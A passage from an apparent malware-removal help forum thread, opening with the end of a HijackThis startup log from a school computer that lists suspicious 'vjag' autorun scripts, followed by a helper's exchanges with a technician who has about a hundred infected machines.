O2 - BHO: Java™ Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Ask Toolbar - {3041d03e-fd4b-44e0-b742-2d9b88305f98} - C:\Program Files\AskBarDis\bar\bin\askBar.dll
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [ISUSScheduler] "C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start
O4 - HKLM\..\Run: [PDVDDXSrv] "C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe"
O4 - HKLM\..\Run: [vjag] C:\WINDOWS\system32\auto\vjag3.bat
O4 - HKLM\..\Run: [vjag2] C:\WINDOWS\system32\auto\vjag.vbs
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKUS\S-1-5-21-3925025582-4110435278-4136060888-1115\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe (User 'tme')
O4 - HKUS\S-1-5-18\..\Run: [DWQueuedReporting] "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [DWQueuedReporting] "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')
O4 - Global Startup: AutoUpdate Monitor.lnk = C:\Program Files\Sophos\AutoUpdate\ALMon.exe
O4 - Global Startup: SMART Board Tools.lnk = C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search && Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windowsupd...b?1207692023140
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = vview.edu
O17 - HKLM\Software\..\Telephony: DomainName = vview.edu
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = vview.edu
O20 - AppInit_DLLs: C:\PROGRA~1\Sophos\SOPHOS~1\SOPHOS~1.DLL
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: dkab_device - Unknown owner - C:\WINDOWS\system32\DKabcoms.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: Sophos Anti-Virus status reporter (SAVAdminService) - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
O23 - Service: Sophos Anti-Virus (SAVService) - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe
O23 - Service: SMART Board Service - SMART Technologies Inc. - C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
O23 - Service: SMART Web Server - Unknown owner - C:\Program Files\SMART Technologies Inc\SMART Board Software\WebServer.exe
O23 - Service: Sophos Agent - Sophos Plc - C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
O23 - Service: Sophos AutoUpdate Service - Sophos Plc - C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
O23 - Service: Sophos Device Control Service - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
O23 - Service: Sophos Message Router - Sophos Plc - C:\Program Files\Sophos\Remote Management System\RouterNT.exe
O23 - Service: User Agent Service (UAService) - Lightspeed Systems - C:\Program Files\Lightspeed Systems\User Agent\UAService.exe

--
End of file - 9121 bytes

#10 Farbar

Farbar

    Just Curious


  • Security Developer
  • 21,689 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Netherlands
  • Local time:05:36 PM

Posted 02 April 2009 - 03:19 PM

How many computers do you have?

Edited by farbar, 02 April 2009 - 03:19 PM.


#11 nightjar59

Posted 02 April 2009 - 03:23 PM

That are infected, about 100 or so. That I have here with me, about 15.

#12 Farbar

Posted 02 April 2009 - 03:31 PM

From your initial post:

I have seen in the Hijack this Forum that Farbar had uploaded a vjag.bat and I have the same problem on one of my Schools Teachers machine and would like to be able to have this file if possible. Thanks.


We are not going to clean them. Each of them needs a fix and there is no fix for all of them.

Edited by farbar, 02 April 2009 - 03:59 PM.


#13 Farbar

Posted 03 April 2009 - 04:07 PM

Are you still there?

#14 nightjar59

Posted 03 April 2009 - 04:25 PM

Yes I am.

#15 Farbar

Posted 03 April 2009 - 04:28 PM

You did not react to my post.



